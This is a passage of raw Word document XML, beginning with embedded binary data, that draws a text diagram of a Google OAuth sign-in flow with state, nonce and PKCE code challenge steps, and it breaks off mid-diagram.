udOLKJAbdxsZvzW4&#10;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&#10;">
                <v:shape id="Shape 2382" o:spid="_x0000_s1298" style="position:absolute;width:64801;height:55340;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,553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LlxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvhf6H8Aq91WxXkbAapQpaD4VaK8XjY/Pc3XbzsiRR13/fFIQeh5n5hpnOe9uKM/nQONbwPMhA&#10;EJfONFxp2H+unhSIEJENto5Jw5UCzGf3d1MsjLvwB513sRIJwqFADXWMXSFlKGuyGAauI07e0XmL&#10;MUlfSePxkuC2lXmWjaXFhtNCjR0tayp/dier4W34dbQjv1h/vx/KV7XdqJPaB60fH/qXCYhIffwP&#10;39oboyEfqhz+3qQnIGe/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGt4wuXHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1439l6480126,5022r,5523968l6474764,5532562v-2334,967,-4763,1451,-7290,1463l19050,5534025v-2526,-12,-4956,-496,-7290,-1463c9426,5531594,7366,5530218,5580,5528444v-1787,-1798,-3163,-3857,-4130,-6189l,5514975,,19050,1450,11745c2417,9413,3793,7355,5580,5569,7366,3783,9426,2406,11760,1439,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,5534025"/>
                </v:shape>
                <v:rect id="Rectangle 2415" o:spid="_x0000_s1299" style="position:absolute;left:1007;top:1455;width:72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ExgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8aaqo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XuBOxMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="486C4CB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16" o:spid="_x0000_s1300" style="position:absolute;left:1552;top:1455;width:4708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CzxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8oTezCZS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rjLQs8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6CC2B9E3" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>Browser                    Our backend                     Google</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2417" o:spid="_x0000_s1301" style="position:absolute;left:1007;top:3169;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243FA763"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18" o:spid="_x0000_s1302" style="position:absolute;left:3186;top:3169;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eFawQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4wuw0VUS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LDh4VrBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1B2C1D06" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2419" o:spid="_x0000_s1303" style="position:absolute;left:1007;top:4884;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TBxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6kYp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N+tRMHHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="7DE6B80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20" o:spid="_x0000_s1304" style="position:absolute;left:3186;top:4884;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hwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCu7GdI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gPsn4cMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2220BA0C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│ 1. GET /auth/google/redirect                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2421" o:spid="_x0000_s1305" style="position:absolute;left:1007;top:6693;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4J6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Dvt4J6xQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="54658CD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22" o:spid="_x0000_s1306" style="position:absolute;left:3186;top:6693;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wNxQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8aWpZ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AfZRwNxQAAAN0AAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="693EEC8A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>├───────────────────────────►│                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2423" o:spid="_x0000_s1307" style="position:absolute;left:1007;top:8408;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1D497F6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24" o:spid="_x0000_s1308" style="position:absolute;left:3186;top:8408;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i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P/AIeLHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1BEF6FD1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│                            │ generate state, </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nonce,   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">  │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2425" o:spid="_x0000_s1309" style="position:absolute;left:1007;top:10122;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R5xwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6azYNV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JCMhHnHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="09E2C0E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26" o:spid="_x0000_s1310" style="position:absolute;left:3186;top:10122;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oOxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvujEU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GBeGg7HAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="77080387"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spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>code_verifier</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">              │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2427" o:spid="_x0000_s1311" style="position:absolute;left:1007;top:11837;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VxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6azYNR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A8Sv5XHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="7E5B5003"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28" o:spid="_x0000_s1312" style="position:absolute;left:3186;top:11837;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nwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCu7GdI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fo0r58MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3BF45B68" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │ challenge = S256(verifier) │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2429" o:spid="_x0000_s1313" style="position:absolute;left:1007;top:13551;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58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EcGOfMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="0C6D866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30" o:spid="_x0000_s1314" style="position:absolute;left:3186;top:13551;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E8wwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L+x/CLHjTdF0R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BSKxPMMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2CB8249D"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gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>cache{</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">state → </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">verifier,   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2431" o:spid="_x0000_s1315" style="position:absolute;left:1007;top:15266;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SnxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Li8JA&#10;EITvwv6HoRe86cQHotFRZFX06GPB3VuTaZOwmZ6QGU301zuCsMeiqr6iZovGFOJGlcstK+h1IxDE&#10;idU5pwq+T5vOGITzyBoLy6TgTg4W84/WDGNtaz7Q7ehTESDsYlSQeV/GUrokI4Oua0vi4F1sZdAH&#10;WaVSV1gHuClkP4pG0mDOYSHDkr4ySv6OV6NgOy6XPzv7qNNi/bs978+T1WnilWp/NsspCE+N/w+/&#10;2zutoD8c9OD1JjwBOX8CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAam4Up8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="491B238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32" o:spid="_x0000_s1316" style="position:absolute;left:3186;top:15266;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140FF974"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gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>nonce}  5</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> min TTL   │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2433" o:spid="_x0000_s1317" style="position:absolute;left:1007;top:16980;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9L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cDOD9JjwBOXsBAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA9fAvS8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="3F72B6D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34" o:spid="_x0000_s1318" style="position:absolute;left:3186;top:16980;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0AA720B5" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│ 2. {</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>authorize_url</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>state}  │</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2435" o:spid="_x0000_s1319" style="position:absolute;left:1007;top:18695;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03E7F6E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36" o:spid="_x0000_s1320" style="position:absolute;left:3186;top:18695;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zT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OWHjNPHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="4C0DAB4B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│◄───────────────────────────┤                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2437" o:spid="_x0000_s1321" style="position:absolute;left:1007;top:20409;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lIxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6q5tas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IrLKUjHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="67ADCD40"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38" o:spid="_x0000_s1322" style="position:absolute;left:3186;top:20409;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753BDE73" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│                            │                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2439" o:spid="_x0000_s1323" style="position:absolute;left:1007;top:22124;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ihxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heQVvuqkW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lBgYocYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5383A42C"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40" o:spid="_x0000_s1324" style="position:absolute;left:3186;top:22124;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JBwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4wuw0VWT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F0kwkHBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="70DCF38E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
